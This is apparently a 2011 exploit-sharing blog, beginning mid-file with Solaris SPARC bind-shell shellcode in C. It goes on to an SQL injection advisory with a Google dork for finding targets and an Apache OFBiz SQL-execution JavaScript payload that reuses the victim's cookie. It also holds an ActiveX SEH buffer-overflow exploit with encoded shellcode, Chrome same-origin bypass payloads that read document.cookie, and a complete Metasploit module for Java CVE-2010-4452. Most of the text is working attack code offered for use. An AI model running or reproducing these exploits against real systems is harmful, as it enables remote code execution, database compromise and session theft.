l1 = '//sh' st %o2, [%sp - 4] ! String ends with NULL st %l1, [%sp - 8] ! Write //sh to stack st %l0, [%sp - 12] ! Write /bin to stack sub %sp, 12, %o0 ! o0 = &string st %o2, [%sp - 16] ! argv[1] = NULL st %o0, [%sp - 20] ! argv[0] = &string sub %sp, 20, %o1 ! o1 = &string mov 0x3b, %g1 ! g1 = 59 = SYS_execve ta 8 ! execve(argv[0], argv, NULL); ! Exit mov 1, %g1 ! g1 = 1 = SYS_exit ta 8 ! exit(); "); } **********************************************************************/ /* Index of low order byte for port */ #define P0 27 #define P1 19 static char solaris_code[] = /* Server address */ "\xa2\x1c\x40\x11" /* xor %l1, %l1, %l1 */ "\xe2\x23\xbf\xf4" /* st %l1, [%sp - 12] */ "\xa2\x10\x20\x02" /* mov 2, %l1 */ "\xe2\x33\xbf\xf0" /* sth %l1, [%sp - 16] */ "\xa2\x10\x20\x30" /* mov 48, %l1 */ "\xa3\x2c\x60\x08" /* sll %l1, 8, %l1 */ "\xa2\x14\x60\x39" /* or %l1, 57, %l1 */ "\xe2\x33\xbf\xf2" /* sth %l1, [%sp - 14] */ /* Address length */ "\xa2\x10\x20\x10" /* mov 16, %l1 */ "\xe2\x23\xbf\xdc" /* st %l1, [%sp - 36] */ /* Create socket */ "\x90\x10\x20\x02" /* mov 2, %o0 */ "\x92\x10\x20\x02" /* mov 2, %o1 */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x82\x10\x20\xe6" /* mov 230, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ "\xa0\x02\x20\x01" /* add %o0, 1, %l0 */ /* Bind address to socket */ "\x92\x23\xa0\x10" /* sub %sp, 16, %o1 */ "\x94\x10\x20\x10" /* mov 16, %o2 */ "\x82\x10\x20\xe8" /* mov 232, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* Listen */ "\x90\x24\x20\x01" /* sub %l0, 1, %o0 */ "\x92\x1a\x40\x09" /* xor %o1, %o1, %o1 */ "\x82\x10\x20\xe9" /* mov 233, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* Accept */ "\x90\x24\x20\x01" /* sub %l0, 1, %o0 */ "\x92\x23\xa0\x20" /* sub %sp, 32, %o1 */ "\x94\x23\xa0\x24" /* sub %sp, 36, %o2 */ "\x82\x10\x20\xea" /* mov 234, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ "\xa0\x02\x20\x01" /* add %o0, 1, %l0 */ /* Set up IO */ "\x90\x24\x20\x01" /* sub %l0, 1, %o0 */ "\x92\x10\x20\x09" /* mov 9, %o1 */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x82\x10\x20\x3e" /* mov 62, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ "\x90\x24\x20\x01" /* sub %l0, 1, %o0 */ "\x94\x10\x20\x01" /* mov 1, %o2 */ "\x91\xd0\x20\x08" /* ta 0x8 */ "\x90\x24\x20\x01" /* sub %l0, 1, %o0 */ "\x94\x10\x20\x02" /* mov 2, %o2 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* Execve /bin/sh */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */ "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 */ "\x23\x0b\xcb\xdc" /* sethi %hi(0x2f2f7000), %l1 */ "\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 */ "\xd4\x23\xbf\xfc" /* st %o2, [%sp - 4] */ "\xe2\x23\xbf\xf8" /* st %l1, [%sp - 8] */ "\xe0\x23\xbf\xf4" /* st %l0, [%sp - 12] */ "\x90\x23\xa0\x0c" /* sub %sp, 12, %o0 */ "\xd4\x23\xbf\xf0" /* st %o2, [%sp - 16] */ "\xd0\x23\xbf\xec" /* st %o0, [%sp - 20] */ "\x92\x23\xa0\x14" /* sub %sp, 20, %o1 */ "\x82\x10\x20\x3b" /* mov 59, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* Exit */ "\x82\x10\x20\x01" /* mov 1, %g1 */ "\x91\xd0\x20\x08"; /* ta 0x8 */ static char _solaris_code[] = "\xa2\x1c\x40\x11\xe2\x23\xbf\xf4\xa2\x10\x20\x02\xe2\x33\xbf\xf0" "\xa2\x10\x20\x30\xa3\x2c\x60\x08\xa2\x14\x60\x39\xe2\x33\xbf\xf2" "\xa2\x10\x20\x10\xe2\x23\xbf\xdc\x90\x10\x20\x02\x92\x10\x20\x02" "\x94\x1a\x80\x0a\x82\x10\x20\xe6\x91\xd0\x20\x08\xa0\x02\x20\x01" "\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8\x91\xd0\x20\x08" "\x90\x24\x20\x01\x92\x1a\x40\x09\x82\x10\x20\xe9\x91\xd0\x20\x08" "\x90\x24\x20\x01\x92\x23\xa0\x20\x94\x23\xa0\x24\x82\x10\x20\xea" "\x91\xd0\x20\x08\xa0\x02\x20\x01\x90\x24\x20\x01\x92\x10\x20\x09" "\x94\x1a\x80\x0a\x82\x10\x20\x3e\x91\xd0\x20\x08\x90\x24\x20\x01" "\x94\x10\x20\x01\x91\xd0\x20\x08\x90\x24\x20\x01\x94\x10\x20\x02" "\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21\x0b\xd8\x9a\xa0\x14\x21\x6e" "\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8" "\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec" "\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01" "\x91\xd0\x20\x08"; int main(void) { void (*code)() = (void *)_solaris_code; _solaris_code[P0] = 0x85; _solaris_code[P1] = 0x1a; printf("Shellcode length: %d\n", strlen(_solaris_code)); /* Shell on port 6789 */ code(); return(1); }
Sunday, April 17, 2011
Advanced Image Hosting v2.2 SQLi Vulnerability
Advanced Image Hosting v2.2 SQLi Vulnerability
[~] Vendor or Software Link : http://yabsoft.com [~] Email : keracker@gmail.com [~] Data : 2011-04-01 [~] Google dork: "Powered by: AIH v2.2" [~] Category: [Webapps] [~] Tested on: [Windows /php] [~] Vulnerable File : http://localhost:80/advanced-image-hosting-v2.2/index.php [~] Vulnerable Variables : The POST variable: gallery_id The POST variable: showlinks The POST variable: gal The POST variable: id The POST variable: type The POST variable: email The POST variable: emaillinks The POST variable: allbox The POST variable: pages The GET variable: http://localhost/Advanced-Image-Hosting-V2.2/index.php?showlinks=1&viewmode=0&gallery_id=[SQLi]
Apache OFBiz SQL Remote Execution PoC Payload.
Apache OFBiz SQL Remote Execution PoC Payload.
var cmd = 'command'; var xmlhttp=false; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (E) { xmlhttp = false; } } if (!xmlhttp && typeof XMLHttpRequest!='undefined') { try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp=false; } } if (!xmlhttp && window.createRequest) { try { xmlhttp = window.createRequest(); } catch (e) { xmlhttp=false; } } xmlhttp.open("POST", " https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true); xmlhttp.onreadystatechange=function() { if (xmlhttp2.readyState==4) { //alert(xmlhttp.responseText) } } var cookie = unescape(document.cookie); xmlhttp.setRequestHeader("content-type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("cookie", cookie); var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString(); var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString(); var post_data = str1+cmd+str2; xmlhttp.send(post_data);
Saturday, April 16, 2011
CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX
====================================================== CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX ======================================================
<html>
<!--
# Software : CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX # Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-042 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH
# Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal !
# Note : you are not allowed to edit/modify this code. # If you do, Tringle2011 cannot be held responsible for any damages this may cause. # # Communicrypt is running a vulnerable version of ANSMTP.dll/AOSMTP.dll # See advisory for more details #
-->
<object classid='clsid:F8D07B72-B4B4-46A0-ACC0-C771D4614B82' id='target' ></object>
<script language='vbscript'>
junk = String(284, "A")
nseh = unescape("%eb%06%90%90")
seh = unescape("%1c%e4%01%10")
align = unescape("%5a%5a%5c%5a%5a%5a%5a%5a%90%90%90%90")
'msgbox: "Exploited by TRINGLE2011!!"
sc = ("TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIK9KS8Z") & _
("N7XYT3JT1IPI1YPI1YQYG9QY790IW9W9730CPCPC73QSP7610ZBJQQ0X0P6PQQP0712K1QW1PQ") & _
("GBQQQRFR72G2VPQRW21Q1RQHPP7HW1W2RUQZPIQZ2Y1ZPKPM0KPKCYPQSTQU2TPJPTQUU10NVR") & _
("PNV2PBQJQVV1QYPYPBPD0N2KPQ51QTRPPLPKPC761TPL0NBK1R0V772LPLPKV1F6W478PL0KV1") & _
("RNQURPPNRK1U2FPPVX600OQWCXF02UPLVSPPQI1U0Q0KU1PKPOQXU1V1T0PL0KF0RLQV1TQURT") & _
("PL0K0Q0UQW0LPLPK0PV40CVUPPT81SFQ0KPZPL0K0B3ZW758PNBK1S3ZQWPPPE0QPJPKW8SSG6") & _
("PWV0QYPN2KQTBTPLPKQUPQPJPNQT2Q1YROF06QPK400KPL0NPLPO44PKRPQSQT0F2JPJ3QQZBO") & _
("W40MPGD10KSG78SYPJV1PK0OQYBO1Y2O0EBK1SPL1U44PQVXV1BEPIPN0NBKW2CJQURTQUV1PJ") & _
("PKQS1F0NBK0F2LW2BK0LPKQSRJQU0LPCFQQZPKPNRKQUV4PNRK1WRQ0MP8POBYV10T1V1T772L") & _
("1U6QPJ53POW2QTQX0F79QX1DPOD9PKV50MF979V2PP58PLPN0PPNW4PNQXRLPPPRPK68PMPLPK") & _
("0OQY2OPKPOPO49F1PUQVE4PMRKPQBNW9W8PMP20Q53PLW71UPLPD54611RPMP8PN2K792OQYBO") & _
("PKPOPL1YG255PGD8G3PX72PLPPRLPERPPKPOV1SHPGQSW5CRQVPNPEWDQU6XPQ5561RCW5VUPD") & _
("VRPM680QPLQTE40DQZ0LQYQXE6PCU60K0OPC2EQVU4PL79PK42V0600MRKPNPHPL5260PM0MBL") & _
("PN2GW72L77QDW6P2PKQHPCRN79ROQYBOQYROPBQX0QT4W5RQPQW8QUT0PC1HW46P1SPGPB0N1R") & _
("QUW4RQPK2KPKFXQS2L7544W6RFPK091XSS1UGH0P3QQRPM60QHQURPPQT8QRPYQUT0V0PTPQSE") & _
("0QSHPDVU1S0BPPE90Q3T1SPX0QP0QSBCQU6U1SPSPQT8PBQU1RPL0PE10PBN1R1X0QFP0QPSPP") & _
("RO60SBQUVXW30TPQ6PPPRBPCPIPQ481RPO73PYQRV4PPCUPQ3HW2E5PQU8QRPPPP2LW6PQPHQY") & _
("PNRH0PPL1VQTQURR0M69PI2QW4T1PJ2RQSSRQSSS0PPQQVP2PKPOPHPP60FQPOFPQV6PPKPO61") & _
("W5740HQU1JQQG1A")
boom = junk + nseh + seh + align + sc
target.AddAttachments boom
</script>
</html>
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
===================================================================
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
=================================================================== # Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL) # (Tringle2011)
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
# Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
# via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
# Some PoC :
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>
java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck
Java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',
'Description' => %q{
This module exploits a vulnerability in Java Runtime Environment
that allows an attacker to escape the Java Sandbox. By supplying a
codebase that points at a trusted directory and a code that is a URL that
does not contain an dots an applet can run without the sandbox.
The vulnerability affects version 6 prior to update 24.
},
'License' => MSF_LICENSE,
'Author' => [
'Frederic Hoguin', # Discovery, PoC
'jduck' # Metasploit module
],
'Version' => '$Revision: 11983 $',
'References' =>
[
[ 'CVE', '2010-4452' ],
# [ 'OSVDB', '' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],
[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
],
'Platform' => [ 'java', 'win' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
[ 'Automatic (no payload)', { } ]
=begin
[ 'Windows x86',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java',
}
],
=end
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 15 2011'
))
register_options(
[
OptString.new('CMD', [ false, "Command to run.", "calc.exe"]),
OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)",
"C:\\Program Files\\java\\jre6\\lib\\ext"]),
], self.class)
end
def exploit
path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)
@java_class = nil
File.open(path, "rb") { |fd|
@java_class = fd.read(fd.stat.size)
}
if not @java_class
raise RuntimeError, "Unable to load java class"
end
super
end
def on_request_uri(cli, request)
#print_status("Received request: #{request.uri}")
jpath = get_uri(cli)
#print_status(jpath)
# Do what get_uri does so that we can replace it in the string
host = Rex::Socket.source_address(cli.peerhost)
host_num = Rex::Socket.addr_aton(host).unpack('N').first
codebase = "file:" + datastore['LIBPATH']
code_url = jpath.sub(host, host_num.to_s)
cmd = datastore['CMD']
cmd_off = 0xb4
cn_off = 0xfc
case request.uri
when /\.class$/
#p = regenerate_payload(cli)
print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")
cls = @java_class.dup
cls[cmd_off,2] = [cmd.length].pack('n')
cls[cmd_off+2,8] = cmd
cn_off += (cmd.length - 8) # the original length was 8 (calc.exe)
cls[cn_off,2] = [code_url.length].pack('n')
cls[cn_off+2,7] = code_url
#File.open('ughz.class', 'wb') { |fd| fd.write cls }
send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })
handler(cli)
else
html = <<-EOS
<html>
<body>
<applet codebase="#{codebase}" code="#{code_url}" />
</body>
</html>
EOS
print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
handler(cli)
end
end
end
Subscribe to:
Posts (Atom)